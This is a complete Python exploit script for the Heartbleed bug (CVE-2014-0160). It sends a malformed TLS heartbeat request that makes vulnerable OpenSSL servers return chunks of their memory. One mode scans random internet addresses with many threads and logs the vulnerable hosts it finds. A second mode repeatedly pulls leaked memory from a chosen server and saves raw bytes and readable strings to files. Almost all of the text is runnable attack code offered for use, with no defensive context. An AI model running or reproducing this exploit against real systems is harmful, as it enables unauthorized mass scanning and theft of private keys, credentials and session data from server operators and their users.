HeartLeak.py

#!/usr/bin/env python27
#=========================================================#
# [+] Title: HeartLeak (CVE-2014-0160)                    #
# [+] Script: HeartLeak.py                                #
# [+] Twitter: https://twitter.com/OffensivePython        #
# [+] Blog: http://pytesting.blogspot.com                 #
#=========================================================#

import socket
import struct
import sys
import time
import random
import threading
from optparse import OptionParser

class heartleak(object):
    def __init__(self, host, port=443, verbose=False):
        try:
            self.sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sick.connect((host, port))
        except socket.error:
            return None
        self.hello="\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90\x9d"
        self.hello+="\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39\x04\xcc"
        self.hello+="\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00\x66\xc0\x14"
        self.hello+="\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x0f"
        self.hello+="\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16"
        self.hello+="\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13\xc0\x09\xc0\x1f\xc0\x1e"
        self.hello+="\x00\x33\x00\x32\x00\x9a\x00\x99\x00\x45\x00\x44\xc0\x0e\xc0\x04"
        self.hello+="\x00\x2f\x00\x96\x00\x41\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05"
        self.hello+="\x00\x04\x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06"
        self.hello+="\x00\x03\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02"
        self.hello+="\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c"
        self.hello+="\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07"
        self.hello+="\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02"
        self.hello+="\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01"
        self.hello+="\x01"

        self.hb="\x18\x03\x02\x00\x03\x01\xFF\xEC"
        self.verbose=verbose

    def receive(self, op):
        data=''
        chunk=''
        typ, version, length = None, None, None
        try:
            data=self.sick.recv(5)
        except socket.error:
            return None, None, None
        
        if data:
            typ, version, length = struct.unpack('>BHH', data)
            if typ==None:
                return None, None, None
            else:
                if op==1: # handshake
                    data=self.sick.recv(length)
                else: # heartbeat
                    # recveive all data sent by the server
                    while True:
                        try:
                            chunk = self.sick.recv(0xFFFF)
                            data+=chunk
                        except socket.error: 
                            break
                return typ, version, data
        else:
            return None, None, None

    def handshake(self):
        
        self.sick.send(self.hello) # send handshake
        while True:
            if self.verbose:
                print("[+] Sending SSL Handshake")
            typ, version, payload = self.receive(1)
            if typ==None:
                if self.verbose:
                    print("[-] Host doesn't support OpenSSL")
                return None
            if typ==22 and ord(payload[0])==0x0E:
                if self.verbose:
                    print("[+] Received Hello back")
                # Received hello back
                break
        return True

    def heartbeat(self):
        if self.verbose:
            print("[+] Sending malicious heartbeat request")
        self.sick.send(self.hb)
        while True:
            typ, version, payload = self.receive(2)
            if typ==None or typ==21:
                return False
            if typ==24:
                if len(payload)>3:
                    return payload
                else:
                    return False

    def destroy(self):
        """ Close connection """
        if self.verbose:
            print("[+] Closing Connection")
        self.sick.close()

def leakTest(hFile, host, port=443):
    global n

    sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sick.connect((host, port))
        sick.close()
        print("[+] %s supports SSL, trying to trigger the bug"%host)
        target=heartleak(host)
        if target and target.handshake():
            if target.heartbeat():
                print("-{#}-- %s is vulnerable -{#}--"%host)
                if port==443:
                    hFile.write(host+'\r\n')
                else:
                    hFile.write(host+":"+port+'\r\n')
                n-=1
                if n>0:
                    print("[+] Still looking for %d vulnerable hosts"%n)
        target.destroy()
    except socket.error:
        sick.close()
        pass

def scan(nhost, port, nthread):
    hFile=open("heartleaked.log", "a")
    global n
    print("[+] Running a scan to find %d vulnerable host(s). Be patient!"%nhost)
    n=nhost
    while n>0:
        try:
            ip=randomHost()
            try:
                while threading.activeCount()>nthread:
                    time.sleep(5)
                t=threading.Thread(target=leakTest, args=(hFile, ip, port))
                t.start()
            except:
                time.sleep(5)
        except KeyboardInterrupt:
            print("[-] Cancelled due to keyboard interruption")
            break
    hFile.close()
    return

def getStrings(data):
    length=len(data)
    printable=''
    i=0
    while i<length:
        j=i
        while ord(data[j])>31 and ord(data[j])<127 and j<length-1:
            j+=1
        if j-i>3: # if found a string of 4 bytes or more
            printable+=data[i:j]+"\r\n"
            i=j
        else:
            i+=1
    return printable

def monitor(host, port):
    print("-{# Sniffing data from %s"%host)
    print("-{# Printable data will be stored in %s"%host+".txt")
    print("-{# Raw data will be stored in %s"%host+".bin")
    ascii=open(host+".txt", "a")
    binary=open(host+".bin", "wb")
    while True:
        target=heartleak(host, port, verbose=True)
        if target and target.handshake():
            try:
                leaked=target.heartbeat()
                binary.write(leaked)
                strings=getStrings(leaked)
                ascii.write(strings)
                print(strings)
                time.sleep(10)
            except KeyboardInterrupt:
                target.destroy()
                break
    ascii.close()
    binary.close()

def randomHost():
    """ Generates a random IP address """
    host=str(random.randint(0,255))
    host+="."+str(random.randint(0,255))
    host+="."+str(random.randint(0,255))
    host+="."+str(random.randint(0,255))
    return host

def main():

    usage="Usage: %prog arg [options]\n"
    usage+="Example:\n"
    usage+="       %prog monitor --server=example.com\n"
    usage+="       %prog scan --nhost=10 --threads=50\n"
    
    parser=OptionParser(usage)

    parser.add_option("-n", "--nhost", dest="nhost", type="int",
                      help="Number of Hosts", default=1)
    parser.add_option("-t", "--threads", dest="nthread", type="int",
                      help="Number of threads (Default: 10 threads)",
                      default=10)
    parser.add_option("-s", "--server", dest="host", type="string",
                      help="Target (IP Address) to monitor")
    parser.add_option("-p", "--port", dest="port", type="int",
                      help="Port number (default: 443)", default=443)

    options, args=parser.parse_args()
    socket.setdefaulttimeout(10)
    if len(args)>0:
        port=options.port
        if args[0]=="scan":
            nhost=options.nhost
            nthread=options.nthread
            scan(nhost, port, nthread)
        elif args[0]=="monitor" and options.host:
            host=options.host
            monitor(host, port)
        else:
            parser.print_help()
    else:
        parser.print_help()

if __name__=="__main__":
    main()